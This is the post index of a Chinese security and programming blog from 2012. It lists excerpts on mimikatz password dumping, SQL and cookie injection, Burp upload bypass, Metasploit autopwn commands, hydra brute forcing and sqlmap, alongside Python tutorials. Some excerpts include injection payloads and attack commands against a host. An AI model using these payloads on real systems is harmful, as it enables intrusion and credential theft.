0ffs3t

行列中 作不朽文章 谈笑间 论古今英雄 痴狂里 诉红尘情爱 来去时 不枉一生风流...

获取Windows系统明文密码神器

今日在群看到某牛发一链接,老外所书某文,介绍使用此器获取系统明文密码的一些方法,具体如下: 注:使用前需确定自身系统是x86还是x64 本人测试环境:windows 2003 密码长度:8位 进入文件所在目录,双击打开mimikatz.exe,按照以下步骤进行, 1、...

2012-02-29 20:04:15

阅读数 1498

评论数 0

mysql报错注入

mysql报错注入 大家好 我是~  式 QQ:40497992 本人承接任何网站安全检测 指定拿站 网站开发 软件开发 seo 收学员 等其业务 没保存 算了 就是这种 无乱是and 1=1 1=2都是返回正常页面的 盲猪也是没戏的 字段19 ...

2012-02-29 14:34:42

阅读数 976

评论数 0

用Burp_suite快速处理上传截断

BlAck.Eagle   Burp suite 是一个安全测试框架,它整合了很多的安全工具,对于渗透的朋友来说,是不可多得的一款囊中工具包,今天笔者带领大家来解读如何通过该工具迅速处理“截断上传”的漏洞。如果对该漏洞还不熟悉,就该读下以前的黑客X档案补习下了。 由于该工具是通过Java写的...

2012-02-29 14:15:56

阅读数 1232

评论数 0

暗月的cookies手工注入

http://127.0.0.1/shownews.asp?id=189 注入点 通用防注入程序 现在我们 cookies突破一下 判断知否有注入 javascript:alert(document.cookie="id="+escape("18...

2012-02-29 11:33:23

阅读数 1652

评论数 0

手工注入详解

现在的网络,脚本入侵十分的流行,而脚本注入漏洞更是风靡黑客界。不管是老鸟还是新起步的小菜,都会为它那巨大的威力和灵活多变的招式所着迷! 正是因为注入攻击的流行,使的市面上的注入工具层出不穷!比较出名的有小竹的NBSI、教主的HDSI和啊D的注入工具等等!这大大方便的小菜们掌握注入漏洞!可是,工具...

2012-02-28 17:26:09

阅读数 1303

评论数 1

落泪红尘渗透笔记

落泪红尘渗透笔记 2012-02-27 14:24 首先把,主站入手 注册一个账号,看下上传点,等等之类的。 用google找下注入点,格式是 Site:XXX.com inurl:asp|php|aspx|jsp 最好不要带 www,因为不带的话可以检测二级域...

2012-02-28 10:59:36

阅读数 1184

评论数 0

半小时精通正则表达式

跟我学正则表达式! 想必很多人都对正则表达式都头疼.今天,我以我的认识,加上网上一些文章,希望用常人都可以理解的表达方式.来和大家分享学习经验. 开篇,还是得说说 ^  和  $  他们是分别用来匹配字符串的开始和结束,以下分别举例说明 “^The”: 开头一定要有”The”字符...

2012-02-27 11:34:47

阅读数 656

评论数 0

Python正则表达式

Python正则表达式 版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明 http://python365.blogbus.com/logs/60722288.html 也许最重要的元字符是反斜杠"\"。 做为 Python 中的字...

2012-02-25 23:04:09

阅读数 553

评论数 0

使用 Python 进行线程编程

引言 对于 Python 来说,并不缺少并发选项,其标准库中包括了对线程、进程和异步 I/O 的支持。在许多情况下,通过创建诸如异步、线程和子进程之类的高层模块,Python 简化了各种并发方法的使用。除了标准库之外,还有一些第三方的解决方案,例如 Twisted、Stackless 和进程...

2012-02-22 16:04:38

阅读数 700

评论数 0

python 用urllib2抓取网页和发布(登录或发布文章)的基本操作

python 用urllib2抓取网页和发布(登录或发布文章)的基本操作 1.最基本的抓取网页 import urllib2 content = urllib2.urlopen(‘http://XXXX’).read() .. 2.使用代理服务器 这在某些情况下比较有用,比...

2012-02-21 13:02:46

阅读数 1099

评论数 0

Python多线程编程

Python线程编程(一)线程对象 我们在做软件开发的时候很多要用到多线程技术。例如如果做一个下载软件象flashget就要用到、象在线视频工具realplayer也要用到因为要同时下载media stream还要播放。其实例子是很多的。 线程相对进程来说是“轻量级”的,操...

2012-02-21 11:49:38

阅读数 530

评论数 0

access基本手工注入

判断 1=1,1=2 1>2,1 判断数据库类型 and (select count (*) from msysobjects)>0     异常access and (select count (*) from sysobjects)>0      mssql...

2012-02-20 18:50:51

阅读数 658

评论数 0

python 多线程应用

python可以方便地支持多线程。可以快速创建线程、互斥锁、信号量等等元素,支持线程读写同步互斥。美中不足的是,python的运行在python 虚拟机上,创建的多线程可能是虚拟的线程,需要由python虚拟机来轮询调度,这大大降低了python多线程的可用性。我们经今天用了经典的生产者和消费...

2012-02-19 19:05:52

阅读数 644

评论数 0

msf自动攻击命令

msf>db_driver sqlite3 db_connect load db_tracker db_nmap -T Aggtessive -sV -n -O -v 192.168.0.7 db_services db_autopwn -h db_autopwn -p -t -...

2012-02-19 19:01:07

阅读数 1071

评论数 0

Python多线程学习

Python多线程学习 一、Python中的线程使用:     Python中使用线程有两种方式:函数或者用类来包装线程对象。 1、  函数式:调用thread模块中的start_new_thread()函数来产生新线程。如下例:   view plaincopy t...

2012-02-19 19:00:04

阅读数 629

评论数 0

ubuntu 系统解决mysql连接问题(ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password:

我的系统是ubuntu8.04,最近新装好的mysql在进入mysql工具时,总是有错误提示: # mysql -uroot -p Enter password: ERROR 1045 (28000): Access denied for user 'root'@'localhost' (u...

2012-02-17 14:54:14

阅读数 897

评论数 0

教你编写远程溢出EXPLOIT

译者注:想必很多朋友都对缓冲区溢出非常了解了,网上也有很多关于windows下的缓冲区溢出漏洞的利用教程(本人也写过几篇)。但是linux下的完整溢出教程我还未看到过(也许是本人眼拙吧)。今天在国外的一个论坛发现这篇文章,感觉此文是一个非常不错的基础教程,因此决定翻译出来供大家鉴赏,自己也算是锻炼...

2012-02-15 18:54:52

阅读数 680

评论数 0

hydra 暴力破解工具

xiaoc[www.81sec.com] [0x00]工具简介      hydra著名黑客组织thc的一款开源的暴力破解工具,可以破解多种密码。 其官网http://www.thc.org,本文测试版本为最新版本5.8,可支持 引用      TELNET, FTP, HTT...

2012-02-15 14:18:55

阅读数 1361

评论数 0

Unix目录结构的来历

Unix(包含Linux)的初学者,常常会很困惑,不明白目录结构的含义何在。 举例来说,根目录下面有一个子目录/bin,用于存放二进制程序。但是,/usr子目录下面还有/usr/bin,以及/usr/local/bin,也用于存放二进制程序;某些系统甚至还有/opt/bin。它们有何区别? ...

2012-02-15 11:58:00

阅读数 476

评论数 0

sqlmap注入Access实例

FROM:暗组   最近学习SQL注入攻击,首先从Access+ASP开始,以前没有发现Linux下有什么针对Access的注入工具,后来才知道原来 SQLMap可以 什么是SQL注入攻击? SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应...

2012-02-14 11:38:07

阅读数 4032

评论数 0

提示
确定要删除当前文章?
取消 删除